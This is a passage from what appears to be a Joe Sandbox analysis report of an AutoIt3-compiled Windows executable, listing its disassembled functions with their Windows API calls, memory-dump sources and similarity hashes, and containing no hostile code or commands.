      • Part of subcall function 0042FEC4: LoadLibraryA.KERNEL32(Wininet.dll,0042AD54,00000000,00000000), ref: 0042FECF
      • Part of subcall function 0042FEC4: GetProcAddress.KERNEL32(00000000,InternetConnectW), ref: 0042FEE1
    • FreeLibrary.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000000), ref: 0042ADE8
      • Part of subcall function 0041FAEE: LoadStringW.USER32(00000066,?,00000FFF,00479E08), ref: 0041FB43
      • Part of subcall function 0041FAEE: LoadStringW.USER32(0047BD30,?,00000FFF), ref: 0041FB56
    • FreeLibrary.KERNEL32(?,0000008C,000000FF,00000000,00000000), ref: 0042AD6D
    • FreeLibrary.KERNEL32(?), ref: 0042B012
    • FreeLibrary.KERNEL32(?), ref: 0042B01C
    • FreeLibrary.KERNEL32(?), ref: 0042B026
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$Free$Load$String$AddressProc
    • String ID:
    • API String ID: 2369986452-0
    • Opcode ID: af94b54ddac54caad890d9ee919eb5e3e29faceb277df146ded0d54e462c7dda
    • Instruction ID: 92fbcbd25f89717f49a0dea9fa4711d163105862c477200d8f3d6367005632a0
    • Opcode Fuzzy Hash: af94b54ddac54caad890d9ee919eb5e3e29faceb277df146ded0d54e462c7dda
    • Instruction Fuzzy Hash: 92A10C71D0052DEBDF11ABA6EC418EEB7B8FF48304B54406BE811B3161DB38AA45DF69
    Function 0042ED85 Relevance: 15.2, APIs: 10, Instructions: 212networkmemoryCOMMON
    Download Yara Rule
    APIs
    • WSAStartup.WSOCK32(00000101,?,00000000), ref: 0042EE13
    • inet_addr.WSOCK32(00000000,00000101,?,00000000), ref: 0042EE3D
    • gethostbyname.WSOCK32(00000000,00000000,00000101,?,00000000), ref: 0042EE46
    • FreeLibrary.KERNEL32(?,00000000,00000000), ref: 0042EE72
    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0042EECC
    • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000101,?,00000000), ref: 0042EEFF
    • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000101,?,00000000), ref: 0042EF09
    • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000101,?,00000000), ref: 0042EF13
    • GlobalFree.KERNEL32(00000000), ref: 0042EFC5
    • WSACleanup.WSOCK32 ref: 0042EFCB
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Free$Library$Global$AllocCleanupStartupgethostbynameinet_addr
    • String ID:
    • API String ID: 3097805930-0
    • Opcode ID: 4e984ea9d4879d2da55e8b6c83fcc1695f2741822a01fa2629435374d886c2c0
    • Instruction ID: c17d4d86a3619faaae84c48cea73a3c8c8d1c6773a1b105f31c35f6741a2f7fe
    • Opcode Fuzzy Hash: 4e984ea9d4879d2da55e8b6c83fcc1695f2741822a01fa2629435374d886c2c0
    • Instruction Fuzzy Hash: 48719C31A00229EBDF20EFA6E9819AEB7B4BF04314F95413BF514A7291C7389D85CB59
    Function 00406DD9 Relevance: 15.2, APIs: 10, Instructions: 152COMMON
    Download Yara Rule
    APIs
    • GetClientRect.USER32(?,00000000), ref: 00406E3D
    • GetWindowRect.USER32(?,00000000), ref: 00406E73
    • ShowWindow.USER32(?,00000006,00000000,?,00000000), ref: 00406EDB
    • ShowWindow.USER32(?,00000000,00000000,?,00000000), ref: 00406EE5
    • ShowWindow.USER32(?,?,00000000,?,00000000), ref: 00406F01
    • LockWindowUpdate.USER32(00000000,00000000,?,00000000), ref: 00406F38
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00406F43
    • LockWindowUpdate.USER32(?,00000000,?,00000000), ref: 00406F50
    • EnableWindow.USER32(?,00000001), ref: 00406F5E
    • ShowWindow.USER32(?,?,00000000,?,00000000), ref: 00406F6D
      • Part of subcall function 0040B6AE: ShowWindow.USER32(00000003,00000000), ref: 0040B705
      • Part of subcall function 0040B6AE: EnableWindow.USER32(00000000,00000000), ref: 0040B719
      • Part of subcall function 0040B6AE: ShowWindow.USER32(00000003,00000000), ref: 0040B766
      • Part of subcall function 0040B6AE: ShowWindow.USER32(00000000,00000004), ref: 0040B76E
      • Part of subcall function 0040B6AE: EnableWindow.USER32(00000000,00000001), ref: 0040B782
      • Part of subcall function 0040B6AE: SendMessageW.USER32(?,0000130C,?,00000000), ref: 0040B7A6
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$Show$EnableRect$LockUpdate$ClientInvalidateMessageSend
    • String ID:
    • API String ID: 3346090438-0
    • Opcode ID: 33eebad1770066d7da53f507c13526217a4cc38fd14724ef0744f22b750f0efe
    • Instruction ID: 00179a3cef90f437505424dea41472531886ad940d9ced4b58695a5b59db2541
    • Opcode Fuzzy Hash: 33eebad1770066d7da53f507c13526217a4cc38fd14724ef0744f22b750f0efe
    • Instruction Fuzzy Hash: 1251C135604385EFCB31CF68D98856BBBA5AF00311B16083FE587E3691D639E864C79D
    Function 00410C44 Relevance: 15.1, APIs: 10, Instructions: 85threadCOMMON
    Download Yara Rule
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00410C65
    • GetForegroundWindow.USER32(00000000), ref: 00410C75
    • GetWindowThreadProcessId.USER32(00000000), ref: 00410C82
    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00410C93
    • GetWindowThreadProcessId.USER32(?,?), ref: 00410CA3
    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?), ref: 00410CB8
    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?), ref: 00410CC7
    • AttachThreadInput.USER32(00000000,00000000), ref: 00410CFF
    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00410D13
    • AttachThreadInput.USER32(00000000,00000000), ref: 00410D1D
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
    • String ID:
    • API String ID: 2156557900-0
    • Opcode ID: 84dc89106fe828588eff58668885925fa9e7e82d517fbaf7a7cf41849782f584
    • Instruction ID: 273981aa6d5314c39ed11dbc8b11d4783a6718a70bb47b2180bf8327ec5c3e70
    • Opcode Fuzzy Hash: 84dc89106fe828588eff58668885925fa9e7e82d517fbaf7a7cf41849782f584
    • Instruction Fuzzy Hash: FE218071504305AFDB24DF66DC44A6BBBEDEB84341F14496FF10582251EBB9A8C0CF69
    Function 00457777 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 235COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: _strcat$___shr_12
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
    • API String ID: 1152255961-4131533671
    • Opcode ID: fb3d597f45c2d145ef8f255b84181ca1f35989882eff8c82b04386920a81ae14
    • Instruction ID: dac7b988a7f31c2646ab102d4da0209923bec554b4ffcb30ba6cbffe36e4aeb7
    • Opcode Fuzzy Hash: fb3d597f45c2d145ef8f255b84181ca1f35989882eff8c82b04386920a81ae14
    • Instruction Fuzzy Hash: 0F913671C0829A9EDF11DB68D8847EEBBB4AF15316F0445BBDC41AB283D3788609C779
    Function 004013E2 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 195COMMON
    Download Yara Rule
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00479BFC,00000104,00000000,004679CC,00479BD8), ref: 00401412
      • Part of subcall function 00416990: CharUpperBuffW.USER32(00401448,?,?,00401448,CmdLineRaw), ref: 00416999
      • Part of subcall function 004169E0: CharUpperBuffW.USER32(00401494,?,?,?,00401494,CmdLine), ref: 004169EC
    • GetModuleFileNameW.KERNEL32(00000000,00479BD8,00000104,CmdLine), ref: 0040151F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: BuffCharFileModuleNameUpper
    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CmdLine$CmdLineRaw
    • API String ID: 2024523369-3010741765
    • Opcode ID: 0b8a9b80ada8196575875686d7710a603bc3a0a7ebde2be102515c1c06a8d65c
    • Instruction ID: 348f64aedd504845f7f551f83b668721e5f2da1375cbe9f9b59148a0ffc6890f
    • Opcode Fuzzy Hash: 0b8a9b80ada8196575875686d7710a603bc3a0a7ebde2be102515c1c06a8d65c
    • Instruction Fuzzy Hash: DB615371E00218ABDF01ABA5C842AEEBB75DF44318F10006FF90177292EB78AD8597D9
    Function 00422EA1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191timeCOMMON
    Download Yara Rule
    APIs
    • GetLocalTime.KERNEL32(?), ref: 00422F74
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00422F82
    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00422F8D
    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0042302C
    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042303F
    • SetCurrentDirectoryW.KERNEL32(?), ref: 00423088
    • SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 004230CA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Time$CurrentDirectory$File$Local$System
    • String ID: *.*
    • API String ID: 1640188443-438819550
    • Opcode ID: 7218f0d6ae7115c819456407795382709412ef67e3b046be7824a149d3b902b3
    • Instruction ID: bdb3071efd987846cfc0d3705619fa8a33cda40b97a1990c55567f1c35d9baa7
    • Opcode Fuzzy Hash: 7218f0d6ae7115c819456407795382709412ef67e3b046be7824a149d3b902b3
    • Instruction Fuzzy Hash: AD617472A00228ABDF10DFA5DD85ACEB3B8AF04315F55409BE904A7105DB78EE85DB68
    Function 0041FAEE Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 134windowCOMMON
    Download Yara Rule
    APIs
    • LoadStringW.USER32(00000066,?,00000FFF,00479E08), ref: 0041FB43
    • LoadStringW.USER32(0047BD30,?,00000FFF), ref: 0041FB56
    • MessageBoxW.USER32(?,?,00011010), ref: 0041FCAB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: LoadString$Message
    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
    • API String ID: 2278601591-2268648507
    • Opcode ID: b28a75fbc5dc2ad875acf3e6d7cb435dcd3e0d4abc745f4c6ef9d9c1d16fa5a3
    • Instruction ID: 6fc9e5af0b6feda39e0b2b0f3be66a4d0474c2105bc075db2bccfe6611d7421c
    • Opcode Fuzzy Hash: b28a75fbc5dc2ad875acf3e6d7cb435dcd3e0d4abc745f4c6ef9d9c1d16fa5a3
    • Instruction Fuzzy Hash: C3416576D00118AAEF21AB95CC45FDE77BCBB04308F0444B7F908E2152EA789A8D9F59
    Function 00424304 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 83COMMON
    Download Yara Rule
    APIs
    • SetErrorMode.KERNEL32(00000001), ref: 00424311
    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,?,00000000), ref: 0042436D
    • GetLastError.KERNEL32 ref: 00424377
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Error$DiskFreeLastModeSpace
    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
    • API String ID: 2351555085-14809454
    • Opcode ID: 4ec2ffc726e2373cc06d30649f94f4b3ba985de401a204f00d0b7c6644fbcec7
    • Instruction ID: 9e21e8075b32901511b120586c6058870a00a7af5fab498cdf3aaad3efea1a69
    • Opcode Fuzzy Hash: 4ec2ffc726e2373cc06d30649f94f4b3ba985de401a204f00d0b7c6644fbcec7
    • Instruction Fuzzy Hash: 9B219132700228ABDB10EBA5D805ADF77A4EF84711F954157EC01E72A1DA7CED81879E
    Function 004028E7 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 80windowCOMMON
    Download Yara Rule
    APIs
    • GetParent.USER32 ref: 00402902
    • GetClassNameW.USER32(00000000,?,00000100), ref: 00402917
    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004029A4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ClassMessageNameParentSend
    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
    • API String ID: 1290815626-3381328864
    • Opcode ID: d88d9084de9778645954b2dac89c947d0fa01af5cf27f13dcbfedf737330abc8
    • Instruction ID: e207e6aa0a9501f7c625afa673fde9d34c0ad767b1b7f61e043eefd813117af9
    • Opcode Fuzzy Hash: d88d9084de9778645954b2dac89c947d0fa01af5cf27f13dcbfedf737330abc8
    • Instruction Fuzzy Hash: 2811AFB2348305BEFA1096609E4EE6723DC9B04726F20146BFD42F21C2EAACAC01596D
    Function 00424006 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 77COMMON
    Download Yara Rule
    APIs
    • SetErrorMode.KERNEL32(00000001), ref: 00424013
    • GetDriveTypeW.KERNEL32(00000000,00000000), ref: 0042405D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: DriveErrorModeType
    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown
    • API String ID: 2651406809-706929342
    • Opcode ID: 825dce0daaf7de83243e5d6314e62d9debbea6aee6917a72c7c6606874c1c808
    • Instruction ID: c236b00be81f74bb42f36345c47f50d6727ad15e36b1af1162972c05b99f5c91
    • Opcode Fuzzy Hash: 825dce0daaf7de83243e5d6314e62d9debbea6aee6917a72c7c6606874c1c808
    • Instruction Fuzzy Hash: E921DE31704324EBC7206B65A845E5B3760EB80B15FA44157F706A72D1DA7CECC1864F
    Function 0040F96A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 65windowCOMMON
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,?,004101C0,00000000,0047BD30,00000000,Unterminated string,?,00000000,?,?,0040FF9B,0047BD30), ref: 0040F987
    • LoadStringW.USER32(00000000,?,004101C0,00000000), ref: 0040F98E
    • MessageBoxW.USER32(?,?,?,00011010), ref: 0040FA4C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: HandleLoadMessageModuleString
    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
    • API String ID: 2734547477-4153970271
    • Opcode ID: de2be6ec606e7735e4205bbb32ebadda35b227ce7c203fecea52da0f3dcabac4
    • Instruction ID: d526ee89b4f850ae7cdf24bbb3a648b0a8c45d5598141b054d4e4435141c55e2
    • Opcode Fuzzy Hash: de2be6ec606e7735e4205bbb32ebadda35b227ce7c203fecea52da0f3dcabac4
    • Instruction Fuzzy Hash: B921367194020ABADF25BF90CC4AF8A7769AB08705F004063BA14A10D2D679DA68DB59
    Function 00450BDA Relevance: 13.7, APIs: 9, Instructions: 196COMMON
    Download Yara Rule
    APIs
    • LCMapStringW.KERNEL32(00000000,00000100,00462758,00000001,00000000,00000000,0045BA70,00000024,0044B575,00000000,00000100,00000100,00000001,?,00000001,?), ref: 00450C01
    • GetLastError.KERNEL32(?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450C13
    • LCMapStringW.KERNEL32(?,00000100,004014B8,?,?,?,0045BA70,00000024,0044B575,00000000,00000100,00000100,00000001,?,00000001,?), ref: 00450C65
    • WideCharToMultiByte.KERNEL32(?,00000000,004014B8,?,00000000,00000000,00000000,00000000,0045BA70,00000024,0044B575,00000000,00000100,00000100,00000001,?), ref: 00450CC0
    • WideCharToMultiByte.KERNEL32(?,00000000,004014B8,?,?,?,00000000,00000000,?,004490FC,?,00000000,0047BCF4,?,?), ref: 00450D32
    • LCMapStringA.KERNEL32(?,00000100,?,?,00000000,00000000,?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450D4E
    • LCMapStringA.KERNEL32(?,00000100,?,?,?,00000000,?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450DBA
    • _strncpy.LIBCMT ref: 00450DDF
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: String$ByteCharMultiWide$ErrorLast_strncpy
    • String ID:
    • API String ID: 4089183155-0
    • Opcode ID: 67a623d9753f22032c0cb21db8fd87a157faa88fc4a4eaae7141a645129955bc
    • Instruction ID: 87915a71c5da1ed2875a20551b42c726cebfd4ef946e7aa7ce96f893867ce171
    • Opcode Fuzzy Hash: 67a623d9753f22032c0cb21db8fd87a157faa88fc4a4eaae7141a645129955bc
    • Instruction Fuzzy Hash: BF71B17580020AEFCF119FA4CC859EF7BB5FF09316F24462AF921A2262C7388D55DB59
    Function 00409F29 Relevance: 13.6, APIs: 9, Instructions: 126windowCOMMON
    Download Yara Rule
    APIs
    • ShowWindow.USER32(?,00000000), ref: 00409FCA
    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00409FD0
    • SetFocus.USER32(?,?,00000000), ref: 00409FDC
    • SendMessageW.USER32(?,00002001,00000000,?), ref: 00409FF9
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ShowWindow$FocusMessageSend
    • String ID:
    • API String ID: 3348785246-0
    • Opcode ID: 2912cf3291633da9375a316781e2fed9097f96e5693141c9d4bec574df01d53a
    • Instruction ID: 1f5e4ee820ca1ad8d5727451a42756ae35113e362d004ced1041d4ab6605815b
    • Opcode Fuzzy Hash: 2912cf3291633da9375a316781e2fed9097f96e5693141c9d4bec574df01d53a
    • Instruction Fuzzy Hash: A641D73140030CBBDF319F24CC89E6E7BA4AB45351F24453BFA42FA2E1D679ED519A4A
    Function 0043CB9B Relevance: 13.6, APIs: 9, Instructions: 70fileCOMMON
    Download Yara Rule
    APIs
    • GetFileType.KERNEL32(000000FF,000000FF,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CBAB
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CBC2
    • ReadFile.KERNEL32(000000FF,000000FF,?,?,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A), ref: 0043CBDC
    • GetLastError.KERNEL32(?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?,00000000,00000000), ref: 0043CBE6
